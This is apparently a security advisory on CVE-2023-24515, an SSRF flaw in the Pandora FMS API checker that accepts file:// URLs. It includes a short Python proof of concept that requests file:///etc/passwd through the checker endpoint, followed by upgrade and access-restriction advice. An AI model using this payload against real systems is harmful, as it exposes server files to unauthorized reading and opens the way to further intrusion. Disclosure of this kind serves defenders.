CVE-2023-24515: Pandora FMS API Checker SSRF Vulnerability in v767 and Earlier Versions

Pandora FMS (Flexible Monitoring System) is a popular open-source system monitoring tool, often deployed for proactive troubleshooting and monitoring of system health. However, a recent critical vulnerability indexed as CVE-2023-24515 has been discovered in the API checker of Pandora FMS. This vulnerability is a Server-Side Request Forgery (SSRF) and allows a malicious user to fetch internal content, potentially exposing sensitive information. The issue affects Pandora FMS versions v767 and earlier versions across all platforms.

Vulnerability Details

The primary issue lies in the application's lack of check on the URL scheme used while retrieving API URLs. Instead of validating and limiting URL schemes to standard http/https, the application allows other schemes such as file://. As a result, it enables an attacker to leverage the API checker function to load file contents from the local server or execute requests on behalf of the server, gaining unauthorized access to internal resources.

Exploit Example

To demonstrate the impact of the vulnerability, we provide an example code snippet exploiting the SSRF.

# Example exploit using Python
import requests

PANDORA_BASE_URL = 'http://pandora.example.com';  # Replace with the target Pandora FMS URL
API_CHECKER_URL = f'{PANDORA_BASE_URL}/include/api/checker.php?'

payload = {
    'url': 'file:///etc/passwd',  # Target file on the server
    'type': 'url_request',
    'output': 'json',
}

response = requests.post(API_CHECKER_URL, data=payload)

if response.ok:
    print("Exploit succeeded! File content:")
    print(response.text)
else:
    print("Exploit failed.")

This exploit shows how an attacker can exploit this vulnerability in Python to fetch the contents of a server's /etc/passwd file. An attacker could use this technique to access sensitive system files, or even try to perform malicious actions by targeting internal APIs or services, and potentially gain further control over the server.

Original References

- CVE-2023-24515 Details
- Pandora FMS Official Website

To mitigate this issue, it is recommended to

1. Upgrade your Pandora FMS server to the latest version v768 or newer, which has the fix for this vulnerability.
2. Limit access to the API checker endpoint, if possible, to only trusted IP addresses or internal networks.

Conclusion

CVE-2023-24515 represents a critical vulnerability in Pandora FMS' API checker, which exposes the application to Server-Side Request Forgery (SSRF) attacks. The lack of URL scheme validation allows an attacker to access sensitive internal data or perform unauthorized actions on behalf of the targeted server. It is essential to upgrade your Pandora FMS installation to the latest version addressing this issue and consider restricting access to the API checker endpoint.

Timeline

Published on: 08/22/2023 19:16:00 UTC
Last modified on: 10/18/2023 12:15:00 UTC